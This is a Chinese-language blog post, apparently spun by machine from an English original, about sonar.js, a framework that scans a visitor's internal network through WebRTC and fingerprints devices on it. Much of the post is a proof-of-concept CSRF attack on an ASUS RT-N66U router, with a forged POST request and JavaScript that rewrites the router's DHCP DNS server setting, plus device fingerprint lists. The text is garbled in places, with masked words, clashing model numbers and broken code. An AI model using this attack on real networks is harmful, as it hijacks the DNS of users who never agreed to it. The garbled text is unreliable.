近期，WebRTC做为一种应用基本网页页面扫描仪內部 *** 的 *** 出現在新闻报道中。大家早已看到了这类作用的一些趣味的运用，例如《 *** 》扫描仪你的內部 *** 来检验智能机器人。互联网技术上的任意网页页面可以扫描仪你的內部 *** 来找寻线上服务器是恐怖的。 *** 攻击能够对你內部 *** 上的主题活动服务器干什么?假如给你过内网渗透的工作经验，就会发现这类状况的恐怖之处。很多內部 *** 弥漫着只必须默认设置凭据就可登录的设备，一系列的cve漏洞让应用Metasploitable开展渗入看起来很安全性，内部网中也有这些插在某一角落里从没配备过的设备。殊不知，虽然WebRTC是很多电脑浏览器的一个恐怖特点，但我都沒有见到一切应用它开发设计漏洞运用的架构。

sonar.js详细介绍

做为回复，我搭建了sonar.js。应用JavaScript、WebRTC和一些onload hackery来检验 *** 上的內部设备的架构。sonar.js的原理是运用WebRTC枚举类型內部 *** 上的主题活动服务器。在枚举类型一个主题活动IP以后，sonar.js试着连接到静态数据资源，如CSS、图象和JavaScript，另外建空onload恶性事件程序处理。假如资源取得成功载入并开启onload恶性事件，那麼大家就了解服务器有着该资源。了解这一有什么作用?根据获得停留在设备上的资源目录，我们可以试着对该设备开展指纹验证。比如，Linksys WRT56G路由器有下列静态数据资源:

/UILinksys.gif

/UI_10.gif

/UI_07.gif

/UI_06.gif

/UI_03.gif

/UI_02.gif

/UI_Cisco.gif

/style.css

因而，如果我们将全部这种资源都置入到大家的网页页面中，而且他们回到一个取得成功的onload恶性事件，那麼大家就可以毫无疑问这一设备的确是一个Linksys WRT54G路由器。sonar.js为大家自动化技术了这一全过程，并容许网站渗透测试工作人员为一系列设备搭建一个自定漏洞目录，假如根据上边的方式检验到一个设备，那麼就会运行搭配的漏洞。

应用sonar.js搭建漏洞

如今您早已了解了sonar.js的原理，大家用它来搭建一个能用的POC。在本训练中，大家试着将內部 *** 上的全部要求再次路由器到我们自己的故意DNS *** 服务器。因为 *** 上的全部手机客户端全是根据DHCP从路由器得到DNS设定的，因此 大家务必对其开展折中。在真实的进攻中，你能有好几个不一样型号规格的路由器的漏洞结合，但现阶段大家仅仅要创建asusRT-N66U WiFi路由器的漏洞结合。幸运的是，RT-N66U沒有跨网站要求仿冒维护，因此 我们可以向这些根据路由器验证的人仿冒要求。下边是一个变更路由器默认设置DNS端口设置的实例要求(它是 *** 上全部手机客户端的DNS *** 服务器):

POST /start_apply.htm HTTP/1.1

Host: 192.168.1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,**;q=0.8");

xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");

xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xhr.withCredentials=true;

var body="productid=RT-N66U&current_page=Advanced_DHCP_Content.asp&next_page=Advanced_GWStaticRoute_Content.asp&next_host=192.168.1.1&modified=0&action_mode=apply&action_wait=30&action_script=restart_net_and_phy&first_time=&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&dhcp_staticlist=&dhcp_enable_x=1&lan_domain=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=86400&dhcp_gateway_x=&dhcp_dns1_x=8.8.8.8&dhcp_wins_x=&dhcp_static_x=0&dhcp_staticmac_x_0=&dhcp_staticip_x_0=&FAQ_input=";

var aBody=new Uint8Array(body.length);

for (var i=0; i new Blob([aBody]));

如今大家的总体目标路由器有一个漏洞——那麼大家如何把它集成化到sonar.js中呢?更先，大家必须建立一个sonar.js指纹识别，下边的编码精彩片段表明了这类指纹识别的文件格式:

var fingerprints=[

{

'name': "ASUS RT-N66U",

'fingerprints':["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],